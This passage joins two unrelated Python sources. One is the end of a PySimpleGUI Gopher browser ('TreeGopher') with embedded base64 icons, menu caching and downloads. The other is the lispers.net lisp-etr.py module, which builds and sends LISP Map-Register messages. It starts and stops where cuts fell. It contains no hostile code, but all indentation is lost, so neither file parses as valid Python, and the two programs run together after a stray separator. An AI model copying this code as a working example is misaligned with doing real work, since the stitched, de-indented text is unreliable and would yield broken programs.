'I': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABNklEQVQ4jWNQtnE47NvUdYAcrGLjcJzBr7VrX9W56//Jwb5NXQeINiB314HTwgpKV0VVVG/n7z1ykWQD+GVlTzJAgYiS2j2KDBBWVnlAsgF5Ow+fEZJXuiiipHwzb+/RCyQbQFIghkyYsb/46Nm7ZBkQOWv+XgYGBncRJdUZ5ScvPUaWKzxw4lLlmas/cBqQsmbTEQYGhghoWLFJaOstrDh15WXVuev/wyfO3MPAxJRjkZC2qeLM1b8YBuTtPHyGiZ09hwEVcMmbWS6zTEzdzMDAYAwV0/CsbtyGYkDRoZPXuISEGhiwAz4GBgYRNDHL8Glzd/s2dR1gMAmPOSIgIzeJgYGBEYcBuICvpIbOdQYGBoZdDAwMLCRqhoGJDAwMDC1kamZgYGBoYGBgYFjLwMBQQyZeAwCR3MS3bOe39AAAAABJRU5ErkJggg==',
'g': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABsUlEQVQ4ja2TTUsbURSG/SEttMY2m7rQKli6sIIrv9qJSZxMMr2TScebmBhc+EFLoBXLCMai1tAPbSkUuhKz6aZQiiLqQqR04cKlSUBwVcj8gKcLsWWSSRHaF57Nuee8vJd7blPT/5IwdXQzhmEJN6MGUVNDmDoNh+OPBAufbF4fLDG7NcPjr1kXohhAjY94G8QtgydrU4higN71TnoKt7m32u6ie7mNoBHwNtDMCN0v27nzvJWu2VsNURNhbwNrbJz9isNOqcpuucp+xWG37LBdctgqOXw7qVI8/ok1Me1tIJIZPvw4Y+37GbmVd0gpXcwsv0dKiWElXfVcLnduqMs0+b0yk4tvkVJSq4ta7ZmU8tzASKZZP6y4GmupNXIlSKQybByd1jVcOkEilWbzqMyzlTeXukJdAmGZFL5ssPj5I9P207r40ZSClJKHRsw9+HsPjBCThRDjS71kVu+SfdWBmPNzf+Iag1kfD6auo9ktKOEB72cMxvrQbB/qXDPq/BW0F1dR8z6G528wbPsJL/gJ5W+iRPob7IGpo4z0EdQGCUYvGPpDbAgl0v/3z/Qv+gW72bfPiU6yowAAAABJRU5ErkJggg==',
'M': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACgElEQVQ4jY2TO0/bYBSGrbZbh6oLXZEYUlUZarAipAoJib3/gaVTGaqOXRg6IDFWghE1HVARU5cCQSStycVOsENNnNi52LG/OL7ks3MRioQEb5cWkSJEX+noLOd5zlkOw9yRnZ2dl/lsdiWb/blyfJx+u7q6+uiu2VtRVfUdpfQyiiIEQQDf99Go1zvJZHLqXliv1T6EYXjlui46nQ4sy4JhGDAMA7qu93ief3onXFGU977vX90EG40GNE2DqqqoVqsol2VnbW3tyS1YKhZf+75/ads2TNOcABVFQblcBs/zODk5QaGQq0zA6+vrU47jRKZpotlsQtf1P9vKyOVy0HUdrutiPB5DkiTIsoxUav/jtWB7a2u62yX9mlZDqVSCoihwHAfD4RAXFxc4Pz/HaDTCcDgEIQSqquLoKPV5QuC6TmTZFvr9PsbjMUajEQaDAfr9PsIwBKUUvV4PkiTBdV2kUv8IHKcTDQYDyKcymq0mPM+D67rXvdvtolgsot1uw3EcHBzsJW8JoihCGIY4TB8im88i/SONDJ9Bhs8gnUnj7OwM3W4XhBDs7d0QbG1uTtu2FfV6PQRBAK2uodVuwQ98EELQbDWRF/PQ6hoIIbAsC/v7379MCEzTjDzPg9E2EIYhPM+D4zjodDoghMC2bVSqFWi6dlvwZnl5tl7Xh57vgYZ0ArIsa6JaRgsto4Xd3a/fGIZ5yDAMwywuvuJEUSC/TuWeLJeoJJVoqVSkpaJIRVGkoihQQRCoIBSoUChQQRCCjY1P2wzDPP57xIOlpYUXC/Pzs4lEgkskWC7BshzLshzLxjk2Hufi8TgXj8e4WCzGzc3NPZ+ZeXb/Y/1PfgOxF0ZCQvJSWwAAAABJRU5ErkJggg==', # mail/newsletter type, example here: gopher://rawtext.club/M/~cmccabe/pubnixhist/nixpub/1991-01-11
'cache': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACu0lEQVQ4ja2SSUwTUBCGB8FYQZTEAydMuHjRi8STB2PEcJIWJAgCgikURYJsrUrYqoSKLJaWrexBgQIa6EJBoC0CLWCAllpaKIiRRRRZIxe98HuwGIV68yVfXl4y/5d5mSH6n4d/6xIjh+vnvUcB1/8XGXsEexels7z+KdDJC6MmxgaxYFFj0aqBuTcP4+0pmOhIhUHGg1HOg7Ez60cB18/NoWBcxW+wdD2Atfshpl+nYaY3Hba+DMyqMzGnycZ7LR8fBnKgV+b7ORTM64VLX8afYXWiGGsGEdaNYmyYSrH5rgxb5nJsT0mwbZFgfrRccCBcJYg8/WnyOVZM9Vgx1eOz/T7AZD2sg2XDBwSvJMnne6vCoCoJRKc4AEoRC8piJhTF/lAI/SEXXv1NpyTS/GfWiYgYubxrPrqmO9DWhkNTHQZ11Q28LGShNZ8JuSgQ3WVB6CoJhEocgK5K9l8dHCIiL78L3hcNMh5GpLEYbuJA3xiNtqJgyMQhUJSG4k19JPprI6CtCYe6IU67/wdePmc8L1t6sjEpT4axIwmG9ntQVkRBUR6BwRexeNsah1HpbQw3x0LXltq5X3DylOeJK7P9Atj6MjDTk46umlioqmPQXRMDZSUbQ83xMClSYJQlY6Q9TbpfcMiN4eI7P1S4u6h/goUhAab7sqFtTICuJRED0kTMabIxq86ErTcDYyp+naM1OPtxVLS7ZhTjq0GE1XEhrOrHGGjhYnk0H8sjT7E0nIdFnQBT6vxSRwKPZUPl9x1bHXZmavFtugbblipsmSXYNFdgw1SG9ckSrBnEsPYL8+zTIyIiFyJyJSKPR/dDfbOSw1i8u8EhiTGsyIRoJjuBw+QkcgI5KfFB7PSksJu5mezrCdHMc0R0jIgO7+2Bs/1xhIiOEpEbEbkT0XE77vaAKxEx7LXOROT0E4+/rF25GHCBAAAAAElFTkSuQmCC'
}
icons['p'] = icons['I'] # pngs
texttypes = ['0', '1', '7', 'h', 'M']
gophertree = sg.TreeData()
sg.theme('DarkTeal1') # Add a touch of color
context_menu = ['', '&Copy URL']
text_menu = ['', ['&Save...', '&Copy File URL']]
gophermenu_layout = sg.Tree(data=gophertree, headings=[], change_submits=True,
auto_size_columns=True, num_rows=26, col0_width=80, max_col_width=200, key='_TREE_', show_expanded=True, enable_events=True, right_click_menu=context_menu, font='Consolas 10', background_color='#fff', text_color='#000')
plaintext_layout = sg.Multiline(key='-OUTPUT-', size=(80, 35), font=('Consolas 10'), background_color='#fff', right_click_menu=text_menu, autoscroll=False, disabled=True, metadata='')
layout = [[gophermenu_layout, plaintext_layout],
[sg.Button('<'), sg.Input(size=(84, 5), key='-QUERY-', do_not_clear=True, default_text="gopher://gopherproject.org/1/", enable_events=True), sg.Button('Go'), sg.Button('Clear Cache'), sg.Checkbox('Use hierarchy', key='-USETREE-', default=True), sg.Text('...', key='-LOADING-', visible=False)],
[sg.StatusBar(text='0 menus in cache.', key='-CACHE-'), sg.Text('', key='-DOWNLOADS-', visible=True, size=(60, 1))]]
window = sg.Window('TreeGopher', layout, font=('Segoe UI', ' 13'), default_button_element_size=(8, 1))
openNodes = []
cache = {}
loadedTextURL = ''
def trim_menu(menu):
try:
while menu[-1].text == '':
del menu[-1]
except:
pass
try:
while menu[0].text == '':
del menu[0]
except:
pass
return menu
def populate(parentNode, request):
global gophertree, openNodes
window.FindElement('-QUERY-').update(request.url())
window.FindElement('-LOADING-').update(visible=True)
if not parentNode in openNodes:
passes = 0
from_cache = False
try:
if request.url() in cache:
from_cache = True
resp = cache[request.url()]
else:
resp = request.get()
cache[request.url()] = resp
passes += 1
except:
sg.popup("We're sorry!", request.url() + ' could not be fetched. Try again later.')
if passes == 1:
try:
menu = trim_menu(resp.menu())
passes += 1
except:
sg.popup("We're sorry!", request.url() + ' could not be parsed as a menu for one reason or another.')
if passes == 2:
if from_cache:
gophertree.insert(parentNode, request.url() + ' <cached>', text='- This is a cached menu, double click to go to the live version -', values=[], icon=icons['cache'])
for item in menu:
if not item.request().url() in openNodes:
sub_url = item.request().url()
if item.path.startswith("URL:"):
sub_url = item.path[4:]
if item.type in icons:
icon = icons[item.type]
else:
icon = icons['9']
if item.type == 'i':
gophertree.insert(parentNode, sub_url,
text=item.text, values=[], icon=icon)
else:
gophertree.insert(parentNode, sub_url, text=item.text, values=[
sub_url], icon=icon)
openNodes.append(parentNode)
window.FindElement('_TREE_').Update(gophertree)
window.FindElement('-LOADING-').update(visible=False)
gui_queue = queue.Queue()
def download_thread(req, dlpath, gui_queue): # This uses Pituophis' Request().stream() function to download a file chunks at a time (instead of all in one shot like with .get())
with open(dlpath, "wb") as dl:
remote_file = req.stream().makefile('rb')
while True:
piece = remote_file.read(1024)
if not piece:
break
dl.write(piece)
gui_queue.put(dlpath) # put a message into queue for GUI
history = []
def dlPopup(url):
return sg.popup_get_file('Where to save this file?', 'Download {}'.format(
url), default_path=url.split('/')[-1], save_as=True)
def go(url):
global gophertree, openNodes, loadedTextURL
window.FindElement('-LOADING-').update(visible=True)
req = pituophis.parse_url(url)
window.FindElement('-QUERY-').update(req.url())
if req.type in texttypes:
if req.type in ['1', '7']:
gophertree = sg.TreeData()
gophertree.insert('', key=req.url(), text=req.url(),
values=[req.url()], icon=icons[req.type])
parentNode = req.url()
history.append(req.url())
openNodes = []
populate(parentNode, req)
else:
try:
resp = req.get()
loadedTextURL = req.url()
window.FindElement('-OUTPUT-').update(resp.text())
except:
sg.popup("We're sorry!", req.url() + ' could not be fetched. Try again later.')
else:
dlpath = dlPopup(req.url())
if not dlpath is None:
window.FindElement('-DOWNLOADS-').update(value='Downloading {}'.format(dlpath))
threading.Thread(target=download_thread, args=(req, dlpath, gui_queue), daemon=True).start()
window.FindElement('-LOADING-').update(visible=False)
def plural(x):
if x > 1 or x < 1:
return 's'
return ''
previousvalue = None
while True: # The Event Loop
event, value = window.read()
if event in (None, 'Exit'): # quit if exit button or X
break
elif event == '_TREE_':
if value == previousvalue:
previousevent = None
# DOUBLE CLICK
# TODO: cooldown
window.FindElement('-LOADING-').update(visible=True)
url = value['_TREE_'][0]
if url.endswith(' <cached>'):
url = url[:-9]
del cache[url]
go(url)
else:
if url.startswith('gopher'):
req = pituophis.parse_url(url)
if req.type == '1':
parentNode = url
if value['-USETREE-']:
populate(parentNode, req)
else:
go(parentNode)
elif req.type == '7':
q = sg.popup_get_text('Search on ' + req.host, '')
if not q is None:
req.query = q
go(req.url())
elif req.type != 'i':
go(req.url())
window.FindElement('-LOADING-').update(visible=False)
else:
os.startfile(url)
previousvalue = value
elif event == 'Go':
go(value['-QUERY-'].rstrip())
elif event == '<':
if len(history) > 1:
h = history[-2]
history.remove(h)
history.remove(history[-1])
go(h)
elif event == 'Copy URL':
url = value['_TREE_'][0]
if url.endswith(' <cached>'):
url = url[:-9]
pyperclip.copy(url)
elif event == 'Copy File URL':
pyperclip.copy(loadedTextURL)
elif event == 'Save...':
dlpath = dlPopup(loadedTextURL)
if not dlpath is None:
with open(dlpath, 'w') as f:
f.write(value['-OUTPUT-'])
elif event == 'Clear Cache':
cache = {}
try:
message = gui_queue.get_nowait()
except queue.Empty: # get_nowait() will get exception when Queue is empty
message = None # break from the loop if no more messages are queued up
# if message received from queue, display the message in the Window
if message:
window.FindElement('-DOWNLOADS-').update(value='')
        if sg.popup_yes_no('Finished downloading {}. Would you like to open the downloaded file?'.format(message)) == 'Yes':
os.startfile(message)
window.FindElement('-CACHE-').update(value='{} menu{} in cache.'.format(len(cache), plural(len(cache))))
window.close()
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import str
import lisp
import lispconfig
import socket
import select
import threading
import time
import struct
from subprocess import getoutput
import os
try:
import pytun
except:
pytun = None
#endtry
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-etr process.
#
lisp_register_timer = None
lisp_trigger_register_timer = None
lisp_etr_info_timer = None
lisp_ephem_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ipc_listen_socket = None
lisp_send_sockets = [None, None, None]
lisp_raw_socket = None
lisp_l2_socket = None
lisp_mac_header = None
LISP_MAP_REGISTER_INTERVAL = 60 # In units of seconds
#
# Test mode. Allows a batch of database-mapping commands to be read from
# lisp.config before any Map-Registers are sent. When an EID 'eid-done' is
# found (which is placed as the last database-mapping command in lisp.config),
# then lisp_build_map_register() is called via the 5-second delay timer.
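# For example (illustrative), starting the lisp-etr process with
# LISP_ETR_TEST_MODE=1 set in its environment enables this batching behavior.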
#
lisp_etr_test_mode = (os.getenv("LISP_ETR_TEST_MODE") != None)
lisp_seen_eid_done = False
#------------------------------------------------------------------------------
#
# lisp_etr_map_server_command
#
# Configure a Map-Server and trigger ETR functionality.
#
def lisp_etr_map_server_command(kv_pair):
global lisp_trigger_register_timer
global lisp_etr_info_timer
ms = lispconfig.lisp_map_server_command(kv_pair)
#
    # Trigger an Info-Request if we are doing NAT-traversal and this is the
    # first Map-Server.
#
first_ms = (len(lisp.lisp_map_servers_list) == 1)
if (first_ms):
ms = list(lisp.lisp_map_servers_list.values())[0]
lisp_etr_info_timer = threading.Timer(2, lisp_etr_process_info_timer,
[ms.map_server])
lisp_etr_info_timer.start()
else:
#
# Trigger Map-Register to newly configured Map-Server.
#
    # Do not trigger Map-Register if NAT-traversal is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (ms and len(lisp.lisp_db_list) > 0):
lisp_build_map_register(lisp_send_sockets, None, None, ms, False)
#endif
#endif
#
# Do not start the trigger timer if we are in test-mode. We may already
# be sending a huge list of Map-Registers after "eid-done".
#
if (lisp_etr_test_mode and lisp_seen_eid_done): return
#
# Handle case where "lisp database-mapping" comes before "lisp map-server"
# in configuration file. We have to start periodic timer.
#
if (len(lisp.lisp_db_list) > 0):
if (lisp_trigger_register_timer != None): return
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
#enddef
#
# lisp_etr_database_mapping_command
#
# This function supports adding additional RLOCs to a database-mapping entry
# that already exists.
#
def lisp_etr_database_mapping_command(kv_pair):
global lisp_register_timer, lisp_trigger_register_timer
global lisp_send_sockets, lisp_seen_eid_done
global lisp_seen_eid_done_count
#
# This is to fix an issue with the same set of database-mappings being
    # sent a second time. In test-mode only, we don't want to duplicate
    # processing for large numbers of entries.
#
if (lisp_seen_eid_done): return
lispconfig.lisp_database_mapping_command(kv_pair, lisp_ephem_port,
(lisp_etr_test_mode == False))
#
    # Trigger Map-Register when all database-mappings are configured.
#
    # Do not trigger Map-Register if NAT-traversal is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (lisp_trigger_register_timer != None): return
#
# Wait until a large set of database-mapping commands are processed
# before sending the first set of Map-Registers. Used in test mode only.
#
if (lisp_etr_test_mode):
db_size = len(lisp.lisp_db_list)
if (db_size % 1000 == 0):
lisp.fprint("{} database-mappings processed".format(db_size))
#endif
db = lisp.lisp_db_list[-1]
if (db.eid.is_dist_name() == False): return
if (db.eid.address != "eid-done"): return
lisp_seen_eid_done = True
lisp.fprint("Finished batch of {} database-mappings".format(db_size))
t = threading.Timer(0, lisp_process_register_timer,
[lisp_send_sockets])
lisp_register_timer = t
lisp_register_timer.start()
return
#endif
if (len(lisp.lisp_map_servers_list) > 0):
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
#enddef
#
# lisp_etr_show_command
#
# Show ETR configured map-servers and database-mappings.
#
def lisp_etr_show_command(clause):
#
# Show local found RLOCs.
#
output = lispconfig.lisp_show_myrlocs("")
#
# Show decapsulation stats.
#
output = lispconfig.lisp_show_decap_stats(output, "ETR")
#
# Show configured map-servers.
#
dns_suffix = lisp.lisp_decent_dns_suffix
if (dns_suffix == None):
dns_suffix = ":"
else:
dns_suffix = " (dns-suffix '{}'):".format(dns_suffix)
#endif
hover = "{} configured map-servers".format(len(lisp.lisp_map_servers_list))
title = "LISP-ETR Configured Map-Servers{}".format(dns_suffix)
title = lisp.lisp_span(title, hover)
hover = ("P = proxy-reply requested, M = merge-registrations " + \
"requested, N = Map-Notify requested")
reg_title = lisp.lisp_span("Registration<br>flags", hover)
output += lispconfig.lisp_table_header(title, "Address", "Auth-Type",
"xTR-ID", "Site-ID", reg_title, "Map-Registers<br>Sent",
"Map-Notifies<br>Received")
for ms in list(lisp.lisp_map_servers_list.values()):
ms.resolve_dns_name()
ms_name = "" if ms.ms_name == "all" else ms.ms_name + "<br>"
addr_str = ms_name + ms.map_server.print_address_no_iid()
if (ms.dns_name): addr_str += "<br>" + ms.dns_name
xtr_id = "0x" + lisp.lisp_hex_string(ms.xtr_id)
flags = "{}-{}-{}-{}".format("P" if ms.proxy_reply else "p",
"M" if ms.merge_registrations else "m",
"N" if ms.want_map_notify else "n",
"R" if ms.refresh_registrations else "r")
registers_sent = ms.map_registers_sent + \
ms.map_registers_multicast_sent
output += lispconfig.lisp_table_row(addr_str,
"sha1" if (ms.alg_id == lisp.LISP_SHA_1_96_ALG_ID) else "sha2",
xtr_id, ms.site_id, flags, registers_sent,
ms.map_notifies_received)
#endfor
output += lispconfig.lisp_table_footer()
#
# Show database-mappings configured.
#
output = lispconfig.lisp_show_db_list("ETR", output)
#
# Show ELP configuration, if it exists.
#
if (len(lisp.lisp_elp_list) != 0):
output = lispconfig.lisp_show_elp_list(output)
#endif
#
# Show RLE configuration, if it exists.
#
if (len(lisp.lisp_rle_list) != 0):
output = lispconfig.lisp_show_rle_list(output)
#endif
#
# Show JSON configuration, if it exists.
#
if (len(lisp.lisp_json_list) != 0):
output = lispconfig.lisp_show_json_list(output)
#endif
#
# Show group-mappings, if they exist.
#
if (len(lisp.lisp_group_mapping_list) != 0):
title = "Configured Group Mappings:"
output += lispconfig.lisp_table_header(title, "Name", "Group Prefix",
"Sources", "Use MS")
for gm in list(lisp.lisp_group_mapping_list.values()):
sources = ""
for s in gm.sources: sources += s + ", "
if (sources == ""):
sources = "*"
else:
sources = sources[0:-2]
#endif
output += lispconfig.lisp_table_row(gm.group_name,
gm.group_prefix.print_prefix(), sources, gm.use_ms_name)
#endfor
output += lispconfig.lisp_table_footer()
#endif
return(output)
#enddef
#
# lisp_etr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_etr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ETR"))
#enddef
#
# lisp_group_mapping_command
#
# Process the "lisp group-mapping" command clause.
#
def lisp_group_mapping_command(kv_pairs):
sources = []
group_prefix = None
rle_address = None
ms_name = "all"
for kw in list(kv_pairs.keys()):
value = kv_pairs[kw]
if (kw == "group-name"):
group_name = value
#endif
if (kw == "group-prefix"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.store_prefix(value)
#endif
if (kw == "instance-id"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.instance_id = int(value)
#endif
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for source in value:
if (source != ""): sources.append(source)
#endfor
#endif
if (kw == "rle-address"):
if (rle_address == None):
rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
rle_address.store_address(value)
#endif
#endfor
gm = lisp.lisp_group_mapping(group_name, ms_name, group_prefix, sources,
rle_address)
gm.add_group()
return
#enddef
#
# lisp_build_map_register_records
#
# Build EID and RLOC records to be inserted in a Map-Register message.
#
def lisp_build_map_register_records(quiet, db, eid, group, ttl):
#
# Don't include RTR-list if there is no NAT in the path but nat-traversal
# is configured and NAT in path is tested. When there is a NAT, include
# all RTRs if lisp_register_all_rtrs is configured. Otherwise, if the
# array element is None, then the RTR is down and should be excluded in
# the list to register.
#
rtr_list = {}
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
for rtr_str in lisp.lisp_rtr_list:
rtr = lisp.lisp_rtr_list[rtr_str]
if (lisp.lisp_register_all_rtrs == False and rtr == None):
lisp.lprint(" Exclude unreachable RTR {}".format( \
lisp.red(rtr_str, False)))
continue
#endif
if (rtr == None): continue
rtr_list[rtr_str] = rtr
        #endfor
break
#endfor
count = 0
eid_records = b""
for iid in [eid.instance_id] + eid.iid_list:
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = len(db.rloc_set) + len(rtr_list)
eid_record.authoritative = True
eid_record.record_ttl = ttl
eid_record.eid.copy_address(eid)
eid_record.eid.instance_id = iid
eid_record.eid.iid_list = []
eid_record.group.copy_address(group)
eid_records += eid_record.encode()
if (not quiet):
prefix_str = lisp.lisp_print_eid_tuple(eid, group)
decent_index = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid)
decent_index = lisp.bold(str(decent_index), False)
decent_index = ", decent-index {}".format(decent_index)
#endif
lisp.lprint(" EID-prefix {} for ms-name '{}'{}".format( \
lisp.green(prefix_str, False), db.use_ms_name, decent_index))
eid_record.print_record(" ", False)
#endif
for rloc_entry in db.rloc_set:
rloc_record = lisp.lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = rloc_entry.rloc.is_local()
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" ")
#endfor
#
        # If we are doing NAT-traversal, include a set of RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in list(rtr_list.values()):
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" RTR ")
#endfor
#
# Return to caller number of EID records written to returned buffer.
#
count += 1
#endfor
return(eid_records, count)
#enddef
#
# lisp_build_map_register
#
# From each configured "database-mapping" command, register mappings to
# configured map-servers.
#
def lisp_build_map_register(lisp_sockets, ttl, eid_only, ms_only, refresh):
#
# No database-mapping entries.
#
if (eid_only != None):
db_list_len = 1
else:
db_list_len = lisp.lisp_db_list_length()
if (db_list_len == 0): return
#endif
if (lisp_etr_test_mode):
lisp.fprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
else:
lisp.fprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
#endif
#
# Set boolean if "decentralized-pull-xtr-[modulus,dns-suffix]" configured.
#
decent = lisp.lisp_decent_pull_xtr_configured()
#
# Go quiet with debug output when there are a lot of EID-records.
#
quiet = (db_list_len > 12)
ms_list = {}
if (decent):
#
# If "decentralized-pull-xtr-[modulus,dns-suffix]" is configured,
        # decide which map-server this EID belongs to (and is registered with).
#
for db in lisp.lisp_db_list:
eid = db.eid if db.group.is_null() else db.group
dns_name = lisp.lisp_get_decent_dns_name(eid)
ms_list[dns_name] = []
#endfor
else:
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count.
#
for ms in list(lisp.lisp_map_servers_list.values()):
if (ms_only != None and ms != ms_only): continue
ms_list[ms.ms_name] = []
#endfor
#endif
#
    # Create data structure instances to build Map-Register message.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.use_ttl_for_timeout = True
if (ttl == None): ttl = lisp.LISP_REGISTER_TTL
#
    # Traverse the database-mapping associative array.
#
mtu = 65000 if (lisp_etr_test_mode) else 1100
for db in lisp.lisp_db_list:
if (decent):
ms_dns_name = lisp.lisp_get_decent_dns_name(db.eid)
else:
ms_dns_name = db.use_ms_name
#endif
#
# Is db entry associated with a map-server name that is not
# configured?
#
if (ms_dns_name not in ms_list): continue
msl = ms_list[ms_dns_name]
if (msl == []):
msl = [b"", 0]
ms_list[ms_dns_name].append(msl)
else:
msl = ms_list[ms_dns_name][-1]
#endif
#
# If dynamic-EIDs are discovered, add each of them to EID-records,
        # unless we are doing a trigger, in which case a single dynamic-EID
# is built into an EID-record.
#
# Otherwise, add static EID-prefixes into EID-records, unless a single
# one is triggered.
#
eid_records = b""
if (db.dynamic_eid_configured()):
for dyn_eid in list(db.dynamic_eids.values()):
eid = dyn_eid.dynamic_eid
if (eid_only == None or eid_only.is_exact_match(eid)):
records, count = lisp_build_map_register_records(quiet, db,
eid, db.group, ttl)
eid_records += records
msl[1] += count
#endif
#endfor
else:
if (eid_only == None):
if (ttl != 0): ttl = db.register_ttl
eid_records, count = lisp_build_map_register_records(quiet, db,
db.eid, db.group, ttl)
msl[1] += count
#endif
#endif
#
# Add EID-records to correct map-server name set.
#
msl[0] += eid_records
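        #
        # Start a new EID-record chunk once 20 records or ~MTU bytes have
        # accumulated so each Map-Register message stays a manageable size.
        #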
if (msl[1] == 20 or len(msl[0]) > mtu):
msl = [b"", 0]
ms_list[ms_dns_name].append(msl)
#endif
#endfor
#
# Send Map-Register to each configured map-server.
#
sleep_time = .500 if (lisp_etr_test_mode) else .001
count = 0
for ms in list(lisp.lisp_map_servers_list.values()):
if (ms_only != None and ms != ms_only): continue
ms_dns_name = ms.dns_name if decent else ms.ms_name
if (ms_dns_name not in ms_list): continue
for msl in ms_list[ms_dns_name]:
#
# Build map-server specific fields.
#
map_register.record_count = msl[1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.key_id = ms.key_id
map_register.proxy_reply_requested = ms.proxy_reply
map_register.merge_register_requested = ms.merge_registrations
map_register.map_notify_requested = ms.want_map_notify
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
if (ms.refresh_registrations):
map_register.map_register_refresh = refresh
#endif
if (ms.ekey != None): map_register.encryption_key_id = ms.ekey_id
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id(b"")
eid_records = msl[0]
packet = packet + eid_records + trailer
ms.map_registers_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
count += 1
if (count % 100 == 0 and lisp_etr_test_mode):
sleep_time += .1
lisp.fprint("Sent {} Map-Registers, ipd {}".format(count,
sleep_time))
#endif
time.sleep(sleep_time)
#endfor
if (lisp_etr_test_mode):
lisp.fprint("Sent total {} Map-Registers".format(count))
#endif
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Exit loop if we are triggering a Map-Register to a single
# Map-Server.
#
if (ms_only != None and ms == ms_only): break
#endfor
return
#enddef
#
# lisp_etr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_etr_process_info_timer(ms):
global lisp_etr_info_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_socket, lisp_ephem_socket, lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, ms, lisp.LISP_CTRL_PORT)
#
# Build Info-Request for RTRs so we can open up NAT state so RTRs
# can encapsulate to us when ETR is behind NAT.
#
allow_private = (os.getenv("LISP_RTR_BEHIND_NAT") == None)
for rtr in list(lisp.lisp_rtr_list.values()):
if (rtr == None): continue
if (rtr.is_private_address() and allow_private == False):
r = lisp.red(rtr.print_address_no_iid(), False)
lisp.lprint("Skip over RTR private address {}".format(r))
continue
#endif
lisp.lisp_build_info_requests(sockets, rtr, lisp.LISP_DATA_PORT)
#endfor
#
# Restart periodic timer. For some reason only this timer has to be
    # canceled. Found while testing NAT-traversal on a rasp-pi in Jul 2015.
#
lisp_etr_info_timer.cancel()
lisp_etr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
return
#enddef
#
# lisp_process_register_timer
#
# Time to send a periodic Map-Register.
#
def lisp_process_register_timer(lisp_sockets):
global lisp_register_timer, lisp_trigger_register_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build and send Map-Register.
#
lisp_build_map_register(lisp_sockets, None, None, None, True)
#
    # If we are doing L2-overlays, then register as a join of the
# broadcast MAC address.
#
if (lisp.lisp_l2_overlay):
entry = [ None, "ffff-ffff-ffff", True ]
lisp_send_multicast_map_register(lisp_sockets, [entry])
#endif
#
# If trigger timer called this function, clear it out and only use it
    # when a new map-server or database-mapping is configured.
#
if (lisp_trigger_register_timer != None):
lisp_trigger_register_timer.cancel()
lisp_trigger_register_timer = None
#endif
#
# Restart periodic timer.
#
if (lisp_register_timer): lisp_register_timer.cancel()
lisp_register_timer = threading.Timer(LISP_MAP_REGISTER_INTERVAL,
